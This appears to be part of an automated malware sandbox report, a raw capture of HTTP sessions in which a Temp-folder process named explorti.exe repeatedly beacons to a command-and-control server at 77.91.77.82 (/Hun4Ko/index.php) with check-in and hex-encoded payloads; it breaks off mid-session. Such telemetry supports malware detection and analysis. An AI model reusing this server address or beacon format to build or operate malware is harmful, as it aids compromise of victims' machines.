                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:01.278857946 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      54192.168.2.44979277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:01.436160088 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:02.128649950 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:02.133744001 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:02.349854946 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      55192.168.2.44979377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:02.475228071 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:03.179894924 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:03.183039904 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:03.408632994 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      56192.168.2.44979477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:03.528894901 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:04.246385098 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:04.250247955 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:04.472119093 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      57192.168.2.44979577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:04.816788912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:05.746682882 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:05.750400066 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      58192.168.2.44979677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:05.756242990 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:06.461555004 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      59192.168.2.44979777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:06.596801043 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:07.302994967 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      60192.168.2.44979877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:07.313673973 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:08.001607895 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      61192.168.2.44979977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:08.119976997 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:08.816020966 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      62192.168.2.44980077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:08.825748920 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:09.533535957 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      63192.168.2.44980177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:09.659813881 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:10.346966982 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      64192.168.2.44980277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:10.355747938 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      65192.168.2.44980377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:10.478475094 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:11.174828053 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:11.180289984 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:11.398205042 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      66192.168.2.44980477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:11.747370958 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:12.487690926 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      67192.168.2.44980577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:12.496397018 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:13.196119070 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      68192.168.2.44980677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:13.321511030 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:14.022491932 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      69192.168.2.44980877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:14.149518013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:14.845501900 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      70192.168.2.44980977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:14.854011059 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:15.556464911 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      71192.168.2.44981077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:15.681344986 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:16.449599028 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      72192.168.2.44981177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:16.459563971 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
